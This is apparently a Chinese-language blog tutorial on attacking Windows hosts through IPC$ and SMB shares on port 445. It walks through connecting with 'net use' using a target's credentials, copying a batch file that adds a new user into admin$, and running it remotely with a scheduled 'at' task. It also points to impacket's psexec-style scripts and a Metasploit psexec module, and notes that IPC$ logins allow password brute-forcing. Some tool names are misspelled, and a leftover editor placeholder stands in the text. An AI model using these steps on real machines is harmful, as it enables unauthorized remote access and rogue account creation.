前言:
IPC$
和windows的SMB共享都是複用了445端口,它們都基於SMB協議實現,但是IPC$
的作用範圍更大一些,它是服務器間進程間通信方式。
IPC$
的登錄驗證方式可分爲:
1:匿名anonymous IPC$
: 空賬號,空密碼可訪問,但是匿名IPC$
的權限往往較低。
2:非匿名IPC$
: 需要帳號密碼的驗證,不過這反過來也爲黑客提供了一種暴力破解windows系統賬戶密碼的方式
3:SMB:局域網文件傳輸協議 445端口 ,139,135,137都需要被打開。
利用方式(手動利用)
通過net share
查看共享資源,當成功建立起了ipc$
連接後,也是可以通過net share
來查看的,通過圖片
可以看到下面的共享是默認開啓的,如果需要徹底禁止共享服務的話,可以在系統服務中禁止“server服務
”
建立連接ipc$,這裏jimolang1231...
是被連接的機器密碼,administrator
是被連接機器的賬號
net use \\被控ip\ipc$ 密碼 /user:賬號:建立ipc$連接
建立好了以後,可以通過net share來進行查看是否結果,在本地機器中新建bat文件,內容爲"net user admins jimolang1231.. /add
"意思就是添加用戶。
copy 文件 \\被控ip\admin$:複製bat文件到被控機器中
查看是否成功上傳到目標機器中,是成功上傳的。
dir \\被控ip\admin$ 查看內容
查看被控機器當前設置,設置計劃任務,
net time \\被控ip:查看被控機時間
設置計劃任務,設置成功。
at \\被控ip 時間 \\被控ip\admin$\文件 :啓動任務
最後我們登錄到被控機器上通過cmd查詢得知,新用戶已經成功添加。
以上的利用方式是最基礎的手動來進行利用,下面介紹如何通過工具的方式來進行ipc$
連接攻擊。
利用方式(工具利用)
這裏推薦的工具是impacket-master.zip
可以去github上下載。
下載解壓後,運行python setup.py install
進行安裝包的安裝,我這裏就在kali中演示(windows也是如此)
winexec.py 賬號:密碼@被控ip地址:工作組環境
winexec.py DC/賬號:密碼被控@ip地址:域環境
smbexec.py賬號:密碼@被控ip 使用的方式和上面一樣
組後一個腳本psexec.py
和上面的利用方式也是一樣的,winexec.py、smbexec.py、psexec.py在這裏插入代碼片
這三個腳本文件都impacket-master.zip
裏面。
當然了也可以直接在kali的msf中加載exploit/windows/smb/psexec
模塊來進行ipc$
攻擊,下面是參數的設置。